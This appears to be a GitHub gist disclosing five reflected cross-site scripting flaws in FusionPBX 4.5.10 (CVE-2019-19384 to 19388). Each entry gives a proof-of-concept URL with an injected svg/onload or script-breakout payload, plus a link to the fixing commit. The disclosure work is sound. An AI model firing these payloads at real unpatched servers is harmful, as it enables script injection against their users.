Skip to content

Instantly share code, notes, and snippets.

@xax007

xax007/FusionPBX-XSS.md

Last active February 4, 2021 10:29
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
FusionPBX-XSS
Raw
FusionPBX-XSS.md

FusionPBX file app/fax/fax_log_view.php "fax_uuid" parameter XSS (CVE-2019-19384)

Cross-site scripting (XSS) vulnerability in file app/fax/fax_log_view.php in FusionPBX 4.5.10 allows remote attackers to inject arbitrary web script or HTML via the "fax_uuid" parameter.

proof of concept:
https://domain/app/fax/fax_log_view.php?fax_uuid=123%27%22%3E%3Csvg/onload=alert(document.domain)%3E%3Ca

fax_log_view

Fixed:
https://github.com/fusionpbx/fusionpbx/commit/aea1abaeb12f69dc22967395c528fb2434e316c1

FusionBPX file app/dialplans/dialplans.php "app_uuid" parameter XSS (CVE-2019-19385)

Cross-site scripting (XSS) vulnerability in file app/dialplans/dialplans.php in FusionPBX 4.5.10 allows remote attackers to inject arbitrary web script or HTML via the "app_uuid" parameter.

proof of concept:
https://domain/app/dialplans/dialplans.php?app_uuid=123%27%22%3E%3Csvg/onload=alert(document.domain)%3E%3Ca

dialplans

Fixed:
https://github.com/fusionpbx/fusionpbx/commit/fe504b83db80ebae30c982770f0f0b200b88cbe9

FusionPBX file app/voicemail_greetings/voicemail_greeting_edit.php "id" parameter XSS (CVE-2019-19386)

Cross-site scripting (XSS) vulnerability in file app/voicemail_greetings/voicemail_greeting_edit.php in FusionPBX 4.5.10 allows remote attackers to inject arbitrary web script or HTML via the "id" parameter.

proof of concept:
https://domain/app/voicemail_greetings/voicemail_greeting_edit.php?id=123%27%3E%3Csvg/onload=alert(document.domain)%3E%3Ca%20href=%27

voicemail_greetings

Fixed:
https://github.com/fusionpbx/fusionpbx/commit/9e837fadecdd5199819a949b5b1bd84b19f716f2

FusionPBX file app/fifo_list/fifo_interactive.php "c" parameter XSS (CVE-2019-19387)

Cross-site scripting (XSS) vulnerability in app/fifo_list/fifo_interactive.php in FusionPBX 4.5.10 allows remote attackers to inject arbitrary web script or HTML via the "c" parameter.

Proof of concept:
https://172.16.19.160/app/fifo_list/fifo_interactive.php?c=123%27;alert(document.domain);//

fifo_interactive

Fixed:
https://github.com/fusionpbx/fusionpbx/commit/44edbfe7a7e256d1b80448026617365a40c92c61

FusionPBX file app/dialplans/dialplan_detail_edit.php "dialplan_uuid" parameter XSS (CVE-2019-19388)

Cross-site scripting (XSS) vulnerability in file app/dialplans/dialplan_detail_edit.php in FusionPBX 4.5.10 allows remote attackers to inject arbitrary web script or HTML via the "dialplan_uuid" parameter.

proof of concept:
https://domain/app/dialplans/dialplan_detail_edit.php?dialplan_uuid=123%27%22%3E%3Csvg/onload=alert(document.domain)%3E%3Ca

dialplan_detail_edit

Fixed:
https://github.com/fusionpbx/fusionpbx/commit/b584973e73a4d25be623c9748dd9817f69422ecc

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment